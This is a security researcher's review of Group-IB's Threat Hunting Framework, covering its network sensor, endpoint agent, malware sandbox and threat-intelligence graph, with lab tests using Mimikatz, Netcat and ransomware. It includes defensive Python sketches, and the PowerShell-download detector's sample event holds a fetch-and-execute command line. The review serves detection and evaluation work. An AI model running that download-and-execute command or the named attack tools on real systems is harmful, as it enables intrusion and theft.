Toni Grzinic, Security Researcher

April 6, 2021

Review: Group-IB Threat Hunting Framework

The IT infrastructure of larger organizations is very heterogeneous. They have endpoints, servers and mobile devices running various operating systems and accessing internal systems. On those systems, there is a great number of disparate tools – from open-source databases and web servers to commercial tools used by the organization’s financial department. Furthermore, these applications can now also be deployed on different clouds to achieve further resilience, adding even more complexity to an already intricate infrastructure.

Managing IT infrastructure poses a hard problem, especially in these pandemic times where the workforce tends to work remotely. Building an additional layer of security over this infrastructure is a complicated undertaking and the success of this project will depend on the availability of security personnel and of security monitoring, detection and response tools that can reduce their burden. Unfortunately, due to the complexity of securing infrastructure and the enormous volume of attack vectors, the maturity of organizations’ security monitoring can fall behind.

One of the solutions to this problem is to use technologies that can provide visibility in the organization’s infrastructure, while simultaneously collecting and detecting anomalous events as well as responding to them.

A few years ago, security expert Anton Chuvakin suggested the concept of EDR (endpoint detection and response) in the form of a lightweight endpoint agent that fills the gap between detection and response capabilities available at that time.

EDR has progressed to the concept of XDR – extended detection and response – which represents a merger of defense and response capabilities between various infrastructure layers (network traffic, email, endpoints, cloud instances, shared storage, etc.).

To be successful, XDR should inspect different layers, record and store events, and – based on its advanced analytics features – correlate events over layers to detect those that should be inspected by higher-tier analysts. The goal is a faster detection and response cycle to reduce the time attackers can lurk in your infrastructure, but also to reduce SOC analysts’ alert fatigue and prevent burnout.

We have tested Group-IB’s Threat Hunting Framework (THF), which tells the full story of an incident and its mastermind and can correlate events and alerts between different infrastructure layers, before escalating incidents that need additional attention from analysts. Its purpose is to do passive security monitoring, but also to uncover attacks and reduce the time attackers spend on your systems. It relies on global threat intelligence capabilities by Group-IB that can give analysts additional context regarding security alerts and incidents.

Methodology

For this review, we used a cloud sensor and a Huntbox (management system) instance. We installed Huntpoint, a separate lightweight endpoint agent, on virtualized (KVM) endpoints. The endpoints ran Windows 10 with the latest patches, and we installed Huntpoint on them manually. For some use cases we disabled Windows Defender (Microsoft’s antivirus solution) so that we could test Huntpoint’s detection and blocking capabilities on their own.

On the endpoints, we performed simple test actions to see if these events are later available in THF. We:

Accessed and downloaded malicious files
Used Windows Script Host with a VBS script
Used PowerShell to obfuscate command execution
Made Wmic process calls
Dumped NTLM hashes with Mimikatz
Opened a bind shell with Netcat

We also performed a full infection with the Ryuk ransomware and tried to isolate the host.

To test email detection capabilities, we used various malicious documents (MS Word files, PDFs) and archives that were additionally nested or were password protected. We sent these malicious documents as email attachments from a ProtonMail account, to avoid emails getting blocked from being delivered to the monitored mailbox.

We tested THF Polygon, the malware detonation platform, with the same set of files. We manually tested Ryuk and Sigma ransomware by uploading them to Polygon. Other malicious files from the test dataset were sent automatically from Huntpoint. The collected indicators were used for testing the Group-IB Threat Intelligence & Attribution system.

During the test we kept an eye on these success factors that helped us form a final opinion of the product:

Detection capabilities (endpoint events, files and email)
Ease of use and integration capabilities
Threat Intelligence data quality while providing context for existing events
Resource consumption (CPU/RAM for EDR, etc.)

Threat Hunting Framework

Group-IB’s Threat Hunting Framework (THF) is a solution that helps organizations identify their security blind spots and gives a holistic layer of protection to their most critical services both in IT and OT environments.

The framework’s objective is to uncover unknown threats and adversaries by detecting anomalous activities and events and correlating them with Group-IB’s Threat Intelligence & Attribution system, which is capable of attributing cybersecurity incidents to specific adversaries. In other words, when you spot a suspicious domain or IP address in your network traffic, with a few clicks you can pivot and uncover what is behind this infrastructure, and view historical evidence of previous malicious activities and available attribution information to help you broaden or quickly close your investigation. THF closely follows the incident response process by having a dedicated component for every step.

There are two flavors of THF: the enterprise version, which is tailored for most business organizations that use a standard technology stack (email server, Windows domain, Windows/macOS endpoints, proxy server, etc.), and the industrial version, which is able to analyze industrial-grade protocols and protect industrial control system (ICS) devices and supervisory control and data acquisition (SCADA) systems.

Threat Hunting Framework is able to:

Analyze network traffic and detect suspicious activities (covert channels, tunnels, remote control, C&C beaconing) by using the Sensor module
Terminate encrypted connections at Layer 2 and Layer 3
Integrate with on-premises and cloud email systems
Provide visibility into endpoints and manage incidents on them using the EDR component/system called THF Huntpoint. THF Huntpoint can detect popular privilege escalation attacks and lateral movement techniques (pass-the-hash/ticket, Mimikatz, NTLM bruteforce, use of living-off-the-land binaries and similar tools)
Analyze files by using the malware detonation platform THF Polygon
Perform advanced threat hunting using logs from THF Huntpoint, email channel, traffic and behavior markers of each analyzed file from any source
Detect anomalies and unknown threats by correlating all available data between various THF modules
Enrich events with data/information from Group-IB’s Threat Intelligence & Attribution cloud database

All the data is enriched and available from a central dashboard and management system called THF Huntbox. THF Huntbox enables incident management, correlation of events and collaboration between analysts during threat hunting and IR activities. All network traffic anomalies, email alerts, Huntpoint detections, and files detonated within Polygon are available and the user can correlate the event data (IoCs) with the Threat Intelligence & Attribution database by using graph analysis and other techniques.

THF can also be paired with CERT-GIB (Group-IB’s Computer Emergency Response Team) by sending telemetry data or IoCs for further investigation by experts, which can bring a higher level of expertise to complex incidents and increase the maturity level of your SOC.

Figure 1 – Threat Hunting Framework’s architecture with all available components

THF components

THF Sensor and THF Decryptor

THF Sensor analyzes incoming and outgoing network traffic in real time and extracts files from it. It uses signatures and ML-based traffic analysis (to detect lateral movement, DGA activity and covert tunnels), and it can block suspicious files through proxy or ICAP integration. All files that are collected from the network traffic can be sent to THF Polygon, a file detonation system that is used for behavioral analysis.
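To give a feel for what DGA detection is looking for, here is a minimal sketch of a classic character-entropy heuristic. It is not the ML-based analysis THF Sensor uses (the review does not describe that in detail); the function names and both thresholds are assumptions chosen for illustration.

```python
import math
from collections import Counter


def shannon_entropy(text: str) -> float:
    """Return the Shannon entropy of `text` in bits per character."""
    if not text:
        return 0.0
    counts = Counter(text)
    total = len(text)
    return -sum((n / total) * math.log2(n / total) for n in counts.values())


def looks_generated(domain: str, min_length: int = 12, threshold: float = 3.5) -> bool:
    """Flag a domain whose longest label is both long and high in entropy.

    Both cut-offs are illustrative assumptions, not tuned values.
    """
    labels = domain.lower().rstrip(".").split(".")
    longest = max(labels, key=len)
    return len(longest) >= min_length and shannon_entropy(longest) >= threshold


if __name__ == "__main__":
    for name in ("example.com", "x7k2q9v4m1z8p3w6.example"):
        print(name, looks_generated(name))
```

A heuristic this simple produces false positives on long legitimate names and misses dictionary-based DGAs, which is one reason real products combine several signals.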

Sensor comes as a 1U physical appliance or can be deployed as a virtual machine, depending on your use case and requirements. For analyzing 250 Mbps over a SPAN port, you will need at minimum 32 GB of RAM and 12 vCPUs. Sensor can analyze mirrored traffic from a SPAN/RSPAN port, TAP devices or RSPAN traffic sent over GRE tunnels, meaning that, when deployed, it has no effect on the enterprise network throughput. Sensor supports a wide range of bandwidth configurations: the standard versions support 250, 1000 and 5000 Mbps, and high-throughput architectures of up to 10 Gbps are also supported. A client can deploy more than one Sensor to cover practically any bandwidth, even at the ISP level.

During analysis, THF Sensor can detect network anomalies such as covert channels, tunnels, remote control, and various techniques of lateral movement. It can also extract email content from mail traffic and analyze it – this capability is pretty interesting because it allows it to spot passwords for archive files sent in emails (and avoid brute-forcing them).
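The idea of reading archive passwords out of the accompanying email can be sketched in a few lines. This is only an illustration of the concept, not how THF Sensor implements it; the regular expression and the function name are assumptions, and the pattern covers only simple English phrasing.

```python
import re

# Phrases that commonly introduce an archive password in an email body.
# The pattern is an illustrative assumption, not a complete rule.
PASSWORD_HINT = re.compile(
    r"\b(?:password|passcode|pwd)\b\s*(?:is|:|=)?\s*[\"']?([^\s\"']+)",
    re.IGNORECASE,
)


def password_candidates(body: str) -> list[str]:
    """Return unique password candidates in order of appearance."""
    seen: list[str] = []
    for match in PASSWORD_HINT.finditer(body):
        # Drop sentence punctuation that trails the captured token.
        candidate = match.group(1).rstrip(".,;")
        if candidate and candidate not in seen:
            seen.append(candidate)
    return seen


if __name__ == "__main__":
    print(password_candidates("Invoice attached. Password: inv2021. Thanks"))
```

The candidates would then be tried against the protected attachment before detonation. The list can contain false positives (for example, the word following "password" in "password protected"), which is harmless because wrong candidates simply fail to open the archive.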

There is a special THF Sensor version tailored for industrial systems, THF Sensor Industrial, which is able to dissect ICS protocols. Sensor Industrial supports a variety of ICS protocols (Modbus, S7comm, S7comm+, UMAS, OPCUA, OPCDA, IEC104, DNP3, DeltaAV, CIP, MQTT and others), and can detect topology changes and control the integrity of software and firmware used on PLCs. It is also possible to set up detection rules based on policies that are available through the configuration options.

THF Sensor can analyze encrypted sessions by using the THF Decryptor component, which detects TLS/SSL-protected sessions, performs a certificate replacement and can route the proxied traffic. THF Decryptor supports all popular TLS versions (1.1 – 1.3) and cipher suites. It can be deployed in two modes: transparent (bridge) mode, which works on OSI Layer 2 and is invisible to the user network, or gateway (router) mode, where it acts as a gateway for the user networks.

THF Huntbox

THF Huntbox is the central management dashboard and reporting point of Group-IB Threat Hunting Framework. It is accessible as a web application and contains management capabilities for THF components (THF Sensor, THF Polygon, and THF Huntpoint). It acts as a correlation engine for managing events, alerts and incidents, as well as scalable storage for all collected raw logs and other data. Through the THF Huntbox interface, users can see event details, create reports, escalate incidents and do threat hunting in the local and global context. THF Huntbox also acts as a front-end for THF Polygon’s dynamic analysis reports.

Figure 2 – The THF Huntbox welcome screen is a dashboard containing the appliance status, statistics and latest alerts

THF Huntbox has the following sections:

Incidents – Critical tickets that need analysts’ immediate attention and resolution. It is possible to collaborate and comment on the progress with other analysts within your organization. We collaborated with CERT-GIB; their support is a high-value service that can augment users’ detection and response ability
Alerts – Potentially malicious events escalated by various THF components (e.g., THF Polygon, THF Huntpoint), containing correlated events and detection information
Graph – Group-IB’s network analysis tool, running on the Group-IB Threat Intelligence & Attribution database, which contains threat data and historical information on all network nodes (including Whois history, SSL certificates, DNS records, etc.), as well as unstructured data collected from various underground communication channels, forums and social networks
Investigation – All available events are located here. This section is divided into:

Emails – Containing all analyzed emails and detections of potentially harmful content
Files – Containing all the files extracted from network traffic, proxy servers, endpoints, emails and file shares. Files can also be uploaded for dynamic analysis manually or automatically via the API. For every file there is an available Polygon report that provides a verdict on whether the file is malicious or benign
Computers – Containing details on and available actions (e.g., isolation from network) for all endpoints registered to the THF instance
Huntpoint events – Containing all events collected from Huntpoint clients
Network connections – Containing extracted network connections from the sensors
Reports – Containing summary reports of all activity in a given date range and reports related to specific incidents, alerts or events

Figure 3 – Correlation in action: Multiple malicious emails sent from the same address resulted in an escalation of an incident

We spent most of the time in the Investigation section, searching for raw events and combing through the file and email reports. Events and their metadata can be forwarded to SIEMs and other monitoring systems via syslog. THF correlates and aggregates events across all of its modules (e.g., an email from THF Sensor and a THF Polygon analysis of its malicious attachment) and can block threats automatically or manually, based on your configuration, rules and policies (see Figure 3 for email). THF Huntbox workflows are easy to get used to, help reduce analysts’ cognitive load and allow them to focus on actionable alerts. All triaging features are present in a central place and searching for additional context is available under the Graph view.

THF Huntbox can also replace a classic ticketing system for tracking incidents and alerts. The Alerts and Incidents sections are helpful for incident response workflows: many events are correlated automatically, and analysts can link alerts to incidents, manually correlate events and comment on the timeline.

Alerts are usually triggered by specific indicators of compromise (domains, IPs, files, emails, Huntpoint events) found during threat hunting activities. Incidents contain one or multiple alerts and other relevant events that give more context.
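The relationship between alerts and incidents can be pictured as a small data model. The sketch below is a simplification under stated assumptions: the `Alert` and `Incident` classes, the `correlate` function and the "two alerts sharing an indicator" rule are all hypothetical and are not taken from THF, whose correlation logic is considerably richer.

```python
from collections import defaultdict
from dataclasses import dataclass, field


@dataclass(frozen=True)
class Alert:
    alert_id: str
    source: str     # hypothetical label, e.g. "email", "huntpoint", "polygon"
    indicator: str  # e.g. sender address, domain, IP address or file hash


@dataclass
class Incident:
    indicator: str
    alerts: list[Alert] = field(default_factory=list)


def correlate(alerts: list[Alert], min_alerts: int = 2) -> list[Incident]:
    """Group alerts by shared indicator and escalate sufficiently large groups."""
    grouped: dict[str, list[Alert]] = defaultdict(list)
    for alert in alerts:
        grouped[alert.indicator].append(alert)
    return [
        Incident(indicator, group)
        for indicator, group in grouped.items()
        if len(group) >= min_alerts
    ]


if __name__ == "__main__":
    sample = [
        Alert("a1", "email", "sender@bad.example"),
        Alert("a2", "email", "sender@bad.example"),
        Alert("a3", "huntpoint", "203.0.113.5"),
    ]
    for incident in correlate(sample):
        print(incident.indicator, [a.alert_id for a in incident.alerts])
```

In this toy model, two malicious emails from the same sender become one incident, while the single endpoint alert stays an alert.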

The collaboration option removes the need for having another system for this specific purpose. Analysts can comment and attach files (although a wider view would be helpful for lengthy comments).

Figure 4 – Alert contains a timeline where it is possible to collaborate and comment on new findings

THF Huntpoint

THF Huntpoint is a lightweight agent installed on endpoints. It collects and analyzes all system changes and user behavior (80+ event types, including created processes, inter-process communications, registry changes, file system changes, network connections, etc.), extracts files from the endpoints and forwards them to THF Polygon for additional analysis. It is used to achieve full visibility of an organization’s endpoints and provides a complete timeline of the events that happened on each of them.

THF Huntpoint detects anomalies and blocks malicious files and can be used to remotely collect forensic data needed for triage or to isolate the infected machine during incident response. The events can be searched with a query language that is similar to other SIEM query languages, like Splunk and Elasticsearch. An example of event details can be seen in Figure 5.

Figure 5 – Huntpoint Event details

Installing THF Huntpoint is a simple process. We installed it manually, but it can be installed with Group Policy or via a specialized THF Huntpoint Installer that is integrated with Active Directory.

We tested our endpoints with malicious files in various formats (documents, executables, and archives such as ZIP, RAR and ISO). Our tests were performed with Windows Defender turned off so that it would not interfere with THF Huntpoint’s detection capabilities. Huntpoint detected all malicious files on the first try; the files were quarantined and triggered alerts visible in THF Huntbox, as shown in Figure 6.

Figure 6 – Malicious files detected with Huntpoint

THF Huntpoint gives a lot of insight into what is happening on the endpoint. All user activity – creating or opening of files/processes/threads/registry keys, network traffic and more – is visible under the Huntpoint Events section in Huntbox.

Figures 7 and 8 – Huntpoint Events search by domain name and IP address

To perform a simple test, we created a text file (action visible in THF Huntbox in Figure 5) and we visited helpnetsecurity.com (action visible in THF Huntbox in Figure 7). Without digging deeply into the documentation, we successfully found the fields needed for querying events. That said, time and patience are needed to get used to the field names and to become nimble at writing more complex Huntpoint event queries.

In THF Huntbox, you can save searches for future investigations and even share these searches with your colleagues. This comes in handy when you want to have a “cookbook” of basic queries to detect some popular misuse cases (e.g., suspicious PowerShell downloads).
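The logic behind such a "cookbook" entry can be sketched outside the product. The example below is not written in the Huntbox query language (the review does not reproduce its syntax); it is a Python approximation over exported process events, and the field names `image` and `command_line` as well as the marker list are assumptions.

```python
import re

# Substrings that often appear when PowerShell fetches remote content.
# The list is an illustrative assumption, not a complete detection rule.
DOWNLOAD_MARKERS = re.compile(
    r"downloadstring|downloadfile|invoke-webrequest|start-bitstransfer|net\.webclient",
    re.IGNORECASE,
)


def is_suspicious_powershell(event: dict) -> bool:
    """Return True if a process event looks like a PowerShell download.

    `image` and `command_line` are hypothetical field names.
    """
    image = event.get("image", "").lower()
    command_line = event.get("command_line", "")
    is_powershell = image.endswith(("powershell.exe", "pwsh.exe"))
    return is_powershell and bool(DOWNLOAD_MARKERS.search(command_line))


if __name__ == "__main__":
    event = {
        "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "command_line": "powershell -c IEX (New-Object Net.WebClient).DownloadString('http://host.example/a')",
    }
    print(is_suspicious_powershell(event))
```

A saved search would express the same two conditions (process is PowerShell, command line contains a download primitive) using the product's own field names.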

The other THF Huntpoint tests that we performed were related to malware infections. We infected our endpoint with ransomware, and the executable files were sent to THF Polygon for detonation and a final verdict. The infections were successfully detected (Figure 9) and were visible in THF Huntbox under Alerts.

Figure 9 – Detection of ransomware that has been sent to Polygon

During this last test, the THF Huntpoint client on the endpoint consumed only 20-40 MB of RAM, with no noticeable pressure on the CPU. From a performance standpoint, you get full visibility with minimal impact on resources. Due to the large number of events generated during the ransomware infection, there was a short delay before some events became available in Huntbox, but after some time, all events were available for querying.

We performed simple tests to see if all scenarios that can be performed by an attacker are recorded in THF Huntpoint and available in THF Huntbox. E.g., in Figures 10 and 11 you can see the detection of Netcat use and of a simple encoded PowerShell execution of a command.
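For readers unfamiliar with encoded PowerShell execution: the `-EncodedCommand` parameter accepts a Base64 string of the command encoded as UTF-16LE, so an analyst triaging such an event usually decodes the argument first. The helper names below are our own; only the encoding scheme is PowerShell's.

```python
import base64


def encode_powershell(command: str) -> str:
    """Encode a command the way PowerShell's -EncodedCommand expects it."""
    return base64.b64encode(command.encode("utf-16-le")).decode("ascii")


def decode_powershell(encoded: str) -> str:
    """Recover the plain-text command from an -EncodedCommand argument."""
    return base64.b64decode(encoded).decode("utf-16-le")


if __name__ == "__main__":
    blob = encode_powershell("whoami")
    print(blob)                     # dwBoAG8AYQBtAGkA
    print(decode_powershell(blob))  # whoami
```

The interleaved `A` characters in the output come from the zero high bytes of UTF-16LE, which makes these blobs easy to recognise in command lines.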

Figures 10 and 11 – Events containing Netcat and PowerShell misuse

We also tried using Mimikatz to dump NTLM hashes present on endpoints, and this event was also successfully detected and escalated to an incident (Figure 12).

Figure 12 – Use of Mimikatz detected on Huntpoint endpoint, visible as an alert

THF Huntpoint is available only for Microsoft Windows for now, but in the near future should also be available for other platforms like macOS and Linux.

THF Polygon

THF Polygon is a file detonation platform. It is integrated into THF to analyze unknown files and emails in an isolated environment. Files can come from network traffic via THF Sensor, ICAP integration for web traffic analysis, local/public file storage, the THF Huntpoint client or API integrations.

Group-IB has developed and maintains an open-source library that simplifies integration with the THF Polygon API, so that it can be employed in any existing application or workflow that deals with untrusted sources of URLs or files (ticket systems, support chats, etc.). The library is available on GitHub and it’s really easy to start using it.

Another integration capability we liked is the existing integration with the Palo Alto XSOAR solution, which allows THF Polygon to be embedded into existing security workflows that run on the XSOAR platform.

Figure 13 – Malicious behavior markers of the analyzed file

The analyzed file is executed in an isolated environment, and after a few (2-5) minutes you get the full behavior analysis report regarding the file, network, registry, process events that were recorded (Figure 13). You can preview the execution changes through a video that shows how the analyzed artifact behaves.

Behavior markers are available as a list or as a populated MITRE ATT&CK matrix (Figure 14). You can also view the file composition and the process tree (Figure 15), which can be useful in detecting techniques that involve process changes (e.g., process injection or process hollowing).
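The difference between the flat list and the matrix view is essentially a regrouping by tactic. A minimal sketch follows, using three real ATT&CK technique IDs as sample data; the marker list is an illustrative example and not output from THF Polygon, and `to_matrix` is a hypothetical helper.

```python
from collections import defaultdict

# (technique ID, technique name, tactics) for a few real ATT&CK techniques.
# The selection is sample data, not output from THF Polygon.
MARKERS = [
    ("T1059.001", "PowerShell", ["Execution"]),
    ("T1055", "Process Injection", ["Defense Evasion", "Privilege Escalation"]),
    ("T1003.001", "LSASS Memory", ["Credential Access"]),
]


def to_matrix(markers):
    """Regroup a flat marker list into a tactic -> techniques mapping."""
    matrix = defaultdict(list)
    for technique_id, name, tactics in markers:
        # A technique that serves several tactics appears in each column.
        for tactic in tactics:
            matrix[tactic].append(f"{technique_id} {name}")
    return dict(matrix)


if __name__ == "__main__":
    for tactic, techniques in to_matrix(MARKERS).items():
        print(f"{tactic}: {', '.join(techniques)}")
```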

Figure 14 – Malicious markers in a MITRE ATT&CK matrix

All IoCs that are collected with THF Polygon can be enriched using Graph Network Analysis to get a global context. THF Polygon can also be used via an API that can trigger analysis and fetch results when it’s finished.
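Triggering an analysis and fetching the result once it has finished is a submit-and-poll pattern. The sketch below shows only that pattern: `submit` and `fetch_status` are hypothetical callables standing in for real API calls, and nothing here reflects the actual THF Polygon API or Group-IB's library.

```python
import time
from typing import Callable, Optional


def wait_for_verdict(
    submit: Callable[[bytes], str],
    fetch_status: Callable[[str], Optional[str]],
    sample: bytes,
    poll_interval: float = 15.0,
    timeout: float = 600.0,
) -> str:
    """Submit a sample, then poll until a verdict arrives or time runs out.

    `submit` returns an analysis ID; `fetch_status` returns None while the
    analysis is still running and a verdict string once it has finished.
    Both are hypothetical stand-ins for real API calls.
    """
    analysis_id = submit(sample)
    deadline = time.monotonic() + timeout
    while True:
        verdict = fetch_status(analysis_id)
        if verdict is not None:
            return verdict
        if time.monotonic() >= deadline:
            raise TimeoutError(f"analysis {analysis_id} did not finish in {timeout}s")
        time.sleep(poll_interval)
```

The default timeout is an assumption, chosen to sit comfortably above the few minutes a detonation took in our tests.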

Figure 15 – Process tree in the THF Polygon report

As we described in the Methodology section of this review, we tried sending malicious attachments to the monitored mailbox. In Figures 16-18, you can see that the files that contained a malicious document and the same archived document were successfully detected after scanning the files with THF Polygon. The mail integration is available for internal mail servers but there is also a new component (Atmosphere) that can scan and detect attacks for mailboxes that are cloud-based (e.g., Office 365 or Google for Business). The mail integration performs attachment and link analysis, but can also detect BEC and spear phishing (i.e., emails that often don’t contain attachments or links).

Figures 16, 17 and 18 – Email processing and detection in action

Graph view (Group-IB Threat Intelligence & Attribution)

Global Threat Intelligence & Attribution is a threat intelligence database and analytical tool that is the result of Group-IB’s efforts aimed at meticulously collecting and scanning the internet for more than a decade. The database contains:

The whole available IPv4 and IPv6 spaces (scanned daily)
211 million SSH fingerprints
650 million domains with historical data going back for more than 16 years (including DNS registration changes, WHOIS records)
1.6 billion certificates
Hashes of malicious files
Data collected from forums and social networks

The interface is simple and similar to that of another Group-IB product – the Fraud Hunting Platform.

This THF component is invaluable, because sometimes you can spot a weird domain or hash while investigating some events and you need more context around it. You copy the indicator in the Graph view and in seconds you have a whole connected graph that helps you to level up your investigation capabilities.

For example, we used a malicious domain that was part of Emotet campaigns; the result is visible in Figure 19. You can refine your search results by shrinking the timeline under the actual graph. You can also control the depth of the graph by setting the number of steps, which limits how far from the main indicator the displayed indicators can be. This is helpful with indicators that have a lot of interconnections.
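Limiting a graph to a number of steps from a starting indicator is a depth-limited breadth-first search. Here is a minimal sketch, assuming the relationships are available as an adjacency mapping; the function name and the sample indicators (reserved example domains and documentation IP addresses) are made up for illustration.

```python
from collections import deque


def neighbours_within(graph: dict[str, set[str]], start: str, max_steps: int) -> dict[str, int]:
    """Return every indicator reachable from `start` in at most `max_steps` hops.

    The result maps each indicator to its distance from `start`.
    """
    distances = {start: 0}
    queue = deque([start])
    while queue:
        node = queue.popleft()
        if distances[node] == max_steps:
            continue  # do not expand beyond the requested depth
        for neighbour in graph.get(node, ()):
            if neighbour not in distances:
                distances[neighbour] = distances[node] + 1
                queue.append(neighbour)
    return distances


if __name__ == "__main__":
    # Hypothetical relationships between indicators.
    sample = {
        "bad.example": {"192.0.2.10", "cert:1234"},
        "192.0.2.10": {"bad.example", "other.example"},
        "other.example": {"192.0.2.10", "198.51.100.7"},
    }
    print(sorted(neighbours_within(sample, "bad.example", 1)))
    print(sorted(neighbours_within(sample, "bad.example", 2)))
```

Each extra step can multiply the number of visible indicators, which is why a depth control matters for heavily interconnected infrastructure.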

Figure 19 – Graph showing data about an Emotet-linked domain

THF takes care of private data and it is compliant with various data security and privacy legislation, so it uses masks to hide private information (e.g., telephone numbers available from social networks). Graph is certainly helpful to analysts but also to law enforcement, because it can be used to build a complete image of a malware campaign’s back-end infrastructure. It is not uncommon for organizations like national CERTs, INTERPOL and Europol to collaborate and partner with Group-IB in takedowns of malware infrastructure and operations.

Figure 20 – Files related to a domain

Graph Network Analysis makes it possible to attribute specific indicators to a specific threat, and to correlate events that at first look unrelated. In Figure 21 you can see that our domain search resulted in the attribution to the Emotet campaign. Compared to manual analysis, which can be a rabbit hole with single indicators spawning additional ones that also have to be analyzed, graph analysis saves you time when you find a suspicious domain in your logs.

Figure 21 – The domain giatot365.com is attributed to Emotet, and uncovers persons related to it

Conclusion and verdict

Threat Hunting Framework is a rock-solid product rooted in Group-IB’s abundant expertise. It is built around the classic incident handling workflow common to Computer Emergency Response Teams. It is simple to use and suitable for SOC analysts of all levels, as well as for CISOs, who can get summary reports and statistics illustrating the security level of their infrastructure.

After the installation of THF Huntpoint and THF Sensor modules, you get all of the tools for threat hunting in your organization out of the box. In most cases, fast triage can be done without leaving THF Huntbox. Depending on your use case scenario, THF can eliminate the need for a full-fledged SIEM and replace its functionality because it is built around the same ideas.

THF has a very mild learning curve. After you get used to the query language and event fields, you can get creative in your threat hunting endeavors pretty quickly. THF supports battle-tested tools like YARA and Suricata, which make it compatible with most threat intelligence sources and enable you to write custom detection rules. It is carefully designed to reduce the number of alerts and, consequently, analysts’ fatigue. This can sometimes come at the cost of fewer automatic detections on endpoints related to red teaming techniques.

THF is a valuable tool for analysts and incident responders. It cannot replace human experts, but it will find anomalies and correlate them over various layers so they don’t have to do it manually. A lack of skilled analysts can be mitigated by using THF in collaboration with CERT-GIB or other managed security service providers (MSSPs) that employ THF as a security platform. Group-IB runs an open partnership program for MSSPs around the world to deliver cutting-edge security services.

We can recommend Threat Hunting Framework because it delivers on the promise of working on various layers (network, email system, files, endpoints, cloud) and providing actionable analytics from incidents/events.

The incident management capabilities are accessible and will be enough for most organizations. Group-IB Threat Intelligence & Attribution will enhance the threat intelligence and hunting capabilities of any organization, enable fast triage or more in-depth analyses, save time and reduce the need to integrate additional feeds.
